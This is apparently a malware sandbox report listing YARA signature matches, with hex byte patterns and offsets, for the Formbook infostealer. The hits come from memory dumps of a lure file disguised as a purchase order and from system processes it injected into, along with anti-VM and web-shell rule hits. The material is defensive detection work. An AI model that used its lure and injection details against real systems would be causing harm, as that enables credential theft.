00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x94c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14ff5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ae1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1526f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9eda:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13d5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xabd3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b247:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c24a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18169:$sqlite3step: 68 34 1C 7B E1 0x1827c:$sqlite3step: 68 34 1C 7B E1 0x18198:$sqlite3text: 68 38 2A 90 C5 0x182bd:$sqlite3text: 68 38 2A 90 C5 0x181ab:$sqlite3blob: 68 53 D8 7F 8C 0x182d3:$sqlite3blob: 68 53 D8 7F 8C
00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5eb9:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c808:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa637:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1551f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9570:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x97ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1531d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14e09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1541f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15597:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa202:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14084:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaefb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b56f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c572:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18491:$sqlite3step: 68 34 1C 7B E1 0x185a4:$sqlite3step: 68 34 1C 7B E1 0x184c0:$sqlite3text: 68 38 2A 90 C5 0x185e5:$sqlite3text: 68 38 2A 90 C5 0x184d3:$sqlite3blob: 68 53 D8 7F 8C 0x185fb:$sqlite3blob: 68 53 D8 7F 8C
00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6131:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ca80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15797:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x97e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9a62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15595:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15081:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15697:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1580f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x142fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb173:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b7e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18709:$sqlite3step: 68 34 1C 7B E1 0x1881c:$sqlite3step: 68 34 1C 7B E1 0x18738:$sqlite3text: 68 38 2A 90 C5 0x1885d:$sqlite3text: 68 38 2A 90 C5 0x1874b:$sqlite3blob: 68 53 D8 7F 8C 0x18873:$sqlite3blob: 68 53 D8 7F 8C
00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: PURCHASED ORDER OF ENG091.exe PID: 3472	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.exe PID: 3472	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x20337:$a1: 3C 30 50 4F 53 54 74 09 40 0x24a2a:$a1: 3C 30 50 4F 53 54 74 09 40 0x427f0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RegAsm.exe PID: 5412	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xb3f:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1d62b3:$s2: ~ Shell I 0x2a21d6:$s2: ~ Shell I
Process Memory Space: cmstp.exe PID: 5552	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x79eaf:$a1: 3C 30 50 4F 53 54 74 09 40 0xed221:$a1: 3C 30 50 4F 53 54 74 09 40 0x184002:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 5728	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 5728	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d27a:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmmon32.exe PID: 4620	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3bb82:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 4872	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 4872	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x355a2:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msdt.exe PID: 3700	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xde977:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3004	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3004	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1e8eb:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msdt.exe PID: 6540	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x132f2a:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3924	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3924	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9e3c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 1824	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x915:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 5128	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 5128	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x11386:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: wlanext.exe PID: 3632	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x66ec5:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 2264	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 2264	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x23917:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msdt.exe PID: 5748	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x106fec:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 2704	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 2704	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3ef6c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: chkdsk.exe PID: 6488	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf8c98:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 6648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 6648	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x388a8:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: netsh.exe PID: 5096	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x66bd8:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 144 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
7.2.RegAsm.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.RegAsm.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd8a21:$a1: 3C 30 50 4F 53 54 74 09 40 0xf8a41:$a1: 3C 30 50 4F 53 54 74 09 40 0xef370:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x10f390:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xdd19f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xfd1bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xe8087:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x1080a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
